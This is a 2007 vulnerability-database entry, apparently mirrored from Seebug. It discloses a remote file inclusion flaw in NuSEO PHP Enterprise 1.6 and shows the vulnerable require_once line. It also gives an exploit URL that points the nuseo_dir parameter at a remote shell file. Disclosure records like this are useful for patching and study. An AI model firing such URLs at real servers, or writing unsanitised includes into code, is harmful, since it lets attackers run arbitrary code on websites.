Search...

NuSEO PHP Enterprise 1.6 Remote File Inclusion Vulnerability

2007-10-11T00:00:00

ID SSV:7365
Type seebug
Reporter Root
Modified 2007-10-11T00:00:00

Description

No description provided by source.

                                        
                                            
                                                Vulnerability&nbsp;Type:&nbsp;Remote&nbsp;File&nbsp;Inclusion
Vulnerable&nbsp;file:&nbsp;/NuSEO&nbsp;PHP&nbsp;Enterprise.v1.6&nbsp;Nulled&nbsp;by&nbsp;DGT/NuSEO.PHP.Enterprise.v1.6.PHP.NULL-DGT/nuseo/admin/nuseo_admin_d.php
Exploit&nbsp;URL:&nbsp;http://localhost/path/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://localhost/shell.txt?
Method:&nbsp;get
Register_globals:&nbsp;On
Vulnerable&nbsp;variable:&nbsp;nuseo_dir
Line&nbsp;number:&nbsp;268
Lines:

----------------------------------------------

require_once(&nbsp;$nuseo_dir&nbsp;.&nbsp;'/nuseo'&nbsp;.&nbsp;'_d.php'&nbsp;);
//nuseo_require_once(&nbsp;$nuseo_config['dir']&nbsp;.&nbsp;'/admin/nuseo_admin_config_file'&nbsp;);

----------------------------------------------

GrEeTs&nbsp;To&nbsp;sHaDoW&nbsp;sEcUrItY&nbsp;TeAm&nbsp;&amp;&nbsp;str0ke

FoUnD&nbsp;By&nbsp;BiNgZa

DoRk'SEO&nbsp;by&nbsp;NuSEO.PHP'

shadowcrew@hotmail.co.uk

shadow.php0h.com

JSON Vulners Source

Initial Source

{"sourceData": "\n Vulnerability Type: Remote File Inclusion\r\nVulnerable file: /NuSEO PHP Enterprise.v1.6 Nulled by DGT/NuSEO.PHP.Enterprise.v1.6.PHP.NULL-DGT/nuseo/admin/nuseo_admin_d.php\r\nExploit URL: http://localhost/path/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://localhost/shell.txt?\r\nMethod: get\r\nRegister_globals: On\r\nVulnerable variable: nuseo_dir\r\nLine number: 268\r\nLines:\r\n\r\n----------------------------------------------\r\n\r\nrequire_once( $nuseo_dir . '/nuseo' . '_d.php' );\r\n//nuseo_require_once( $nuseo_config['dir'] . '/admin/nuseo_admin_config_file' );\r\n\r\n----------------------------------------------\r\n\r\nGrEeTs To sHaDoW sEcUrItY TeAm & str0ke\r\n\r\nFoUnD By BiNgZa\r\n\r\nDoRk'SEO by NuSEO.PHP'\r\n\r\nshadowcrew@hotmail.co.uk\r\n\r\nshadow.php0h.com\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-7365", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-7365", "type": "seebug", "viewCount": 6, "references": [], "lastseen": "2017-11-19T21:56:29", "published": "2007-10-11T00:00:00", "cvelist": [], "id": "SSV:7365", "enchantments_done": [], "modified": "2007-10-11T00:00:00", "title": "NuSEO PHP Enterprise 1.6 Remote File Inclusion Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.4}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645506200}}